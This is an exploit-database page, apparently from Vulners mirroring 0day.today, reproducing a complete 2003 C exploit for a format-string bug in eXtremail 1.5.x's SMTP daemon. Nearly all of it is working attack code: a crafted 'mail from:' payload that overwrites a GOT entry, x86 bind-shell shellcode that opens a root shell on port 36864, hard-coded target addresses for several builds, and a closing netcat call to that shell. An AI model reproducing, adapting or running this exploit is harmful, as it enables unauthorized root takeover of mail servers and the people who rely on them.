Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux eXtremail 1.5.x Remote Format Strings Exploit

🗓️ 02 Jul 2003 00:00:00Reported by B-r00tType 
zdt
 zdt🔗 0day.today👁 23 Views

Linux eXtremail 1.5.x exploit uses format bug to bind a shell on port 36864, exposing servers.

Code
===================================================
Linux eXtremail 1.5.x Remote Format Strings Exploit
===================================================

/****************************************************************/
/* 	    Linux eXtremail 1.5.x Remote Format Strings Exploit	                */
/*                                                           		                                */
/*							*/
/*      	                       By B-r00t - 02/07/2003			*/
/*							*/
/*	Versions:       Linux eXtremail-1.5-8 => VULNERABLE		*/
/*		    Linux eXtremail-1.5-5 => VULNERABLE		*/
/*	Exploit uses format strings bug in fLog() of smtpd to bind a 	*/
/*	r00tshell to port 36864 on the target eXtremail server.		*/
/*							*/
/****************************************************************/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>

#define EXPLOIT "eXtreme"
#define DEST_PORT 25

// Prototypes
int get_sock (char *host);
int send_sock (char *stuff);
int read_sock (void);
void usage (void);
int do_it (void);

// Globals
int socketfd, choice;
unsigned long GOT, RET;
char *myip;
char helo[] = "HELO Br00t~R0x~Y3r~W0rld!\n";
char shellcode[] = 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
"\x80\x43\xc6\x46\x10\x10\x88\x46"
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
"\x80\x88\x56\x07\x89\x76\x0c\x87"
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68";


struct {
        char *systemtype;
        unsigned long got;
        unsigned long ret;
        int pad;
        int buf;
        int pos;
} targets[] = {
	// Confirmed targets tested by B-r00t.
        { "RedHat 7.2 eXtremail V1.5 release 5 
(eXtremail-1.5-5.i686.rpm)",   0x0813b19c, 0xbefff1e8, 1, 266, 44},
        { "Linux ANY eXtremail V1.5 release 5 
(eXtremail-1.5-5.tar.gz)",   0x0813b19c, 0xbefff1b8, 1, 266, 44},
	{ "Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)",   0xbefff0c8, 
0xbefff1d4, 1, 266, 44},
        { "eXtremail V1.5 DEBUG",   0x44434241, 0xaaaaaaaa, 1, 266, 
44},
        { 0 } 
	};

int main ( int argc, char *argv[] )
{
char *TARGET = "TARGET";

printf ("\n%s by B-r00t <[email protected]>. (c) 2003\n", 
EXPLOIT);

if (argc < 3) 
usage ();

choice = atoi(argv[2]);
if (choice < 0 || choice > 3) 
usage ();

setenv (TARGET, argv[1], 1);

get_sock(argv[1]);
sleep (1);
read_sock ();
sleep (1);
send_sock (helo);
sleep (1);
read_sock ();
sleep(1);
do_it ();
}


void usage (void)
{
        int loop;
	printf ("\nUsage: %s [IP_ADDRESS] [TARGET]", EXPLOIT);
        printf ("\nExample: %s 10.0.0.1 2 \n", EXPLOIT);
	for (loop = 0; targets[loop].systemtype; loop++)
			printf ("\n%d\t%s", loop, targets[loop].systemtype);
        printf ("\n\nOn success a r00tshell will be spawned on port 
36864.\n\n");
	exit (-1);
        }


int get_sock (char *host) 
{
struct sockaddr_in dest_addr;

if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
        perror("Socket Error!\n");
        exit (-1);
        }

dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(DEST_PORT);
if (! inet_aton(host, &(dest_addr.sin_addr))) {
        perror("inet_aton problems\n");
        exit (-2);
        }

memset( &(dest_addr.sin_zero), '\0', 8);
if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct 
sockaddr)) == -1){
        perror("Connect failed!\n");
        close (socketfd);
        exit (-3);
        }
printf ("\n\nConnected to %s\n", host);
}



int send_sock (char *stuff) 
{
	int bytes;
        bytes = (send (socketfd, stuff, strlen(stuff), 0));
        if (bytes == -1) {
        perror("Send error");
        close (socketfd);
        exit(4);
	}
printf ("Send:\t%s", stuff);
return bytes;
}


int read_sock (void) 
{
        int bytes;
	char buffer[200];
	char *ptr;
	ptr = buffer;
	memset (buffer, '\0', sizeof(buffer));
        bytes = (recv (socketfd, ptr, sizeof(buffer), 0));
        if (bytes == -1) {
        perror("send error");
        close (socketfd);
        exit(4);
	}
printf ("Recv:\t%s", buffer);
return bytes;
}


int do_it (void)
{
char format[200], buf[500], *bufptr, *p;
int loop, sofar = 0;
int PAD = targets[choice].pad;
int POS = targets[choice].pos;
unsigned char r[3], g[3], w[3];

RET = targets[choice].ret;
r[0] = (int) (RET & 0x000000ff);
r[1] = (int)((RET & 0x0000ff00) >> 8);
r[2] = (int)((RET & 0x00ff0000) >> 16);
r[3] = (int)((RET & 0xff000000) >> 24);

GOT = targets[choice].got;
g[0] = (int) (GOT & 0x000000ff);
g[1] = (int)((GOT & 0x0000ff00) >> 8);
g[2] = (int)((GOT & 0x00ff0000) >> 16);
g[3] = (int)((GOT & 0xff000000) >> 24);


// Start buf
bufptr = buf;
bzero (bufptr, sizeof(buf));
strncpy (buf, "mail from: ", strlen("mail from: "));
sofar = 19;

// Do padding
for (loop=0; loop<PAD; loop++)
strncat (buf, "a", 1);
sofar = sofar+PAD;

//1st GOT addy
strncat (buf, g, 4);

//2nd GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);

// 3rd GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);

// 4th GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);
sofar = sofar+16;

for (loop=0; loop<4; loop++) {
			if (r[loop] > sofar) {
						w[loop] = r[loop]-sofar;
						} else
			if (r[loop] == sofar) {
						w[loop] = 0;
						}else
			if (r[loop] < sofar) {
						w[loop] = (256-sofar)+r[loop];
						}
			sofar = sofar+w[loop];
			}

bufptr = format;
bzero (bufptr, sizeof(format));
sprintf (bufptr, "%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n", 
w[0], POS, w[1], POS+1, w[2], POS+2, w[3], POS+3);
strncat (buf, format, sizeof(format));
strncat (buf, shellcode, sizeof(shellcode));

// Summarise
printf ("\nSystem type:\t\t%s", targets[choice].systemtype);
printf ("\nWrite Addy:\t\t0x%x", GOT);
printf ("\nRET (shellcode):\t0x%x", RET);
printf ("\nPAD (alignment):\t%d", PAD);
printf ("\nPayload:\t\t%d / %d max bytes", strlen(buf), 
targets[choice].buf);
printf ("\nSending it ... \n");
sleep(1);

// Ok lets Wack it!
send_sock (buf);
sleep (1);
close (socketfd);
printf ("\nUsing netcat 'nc' to get the r00tshell on port 36864 
....!!!!!\n\n\n");
sleep(3); // May take time to spawn a shell
system("nc -vv ${TARGET} 36864 || echo 'Sorry Exploit failed!'");
exit (0);
}

 

#  0day.today [2018-01-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Jul 2003 00:00Current
7.1High risk
Vulners AI Score7.1
linux extremailremote exploitformat string vulnerabilitybind shellport 36864.
23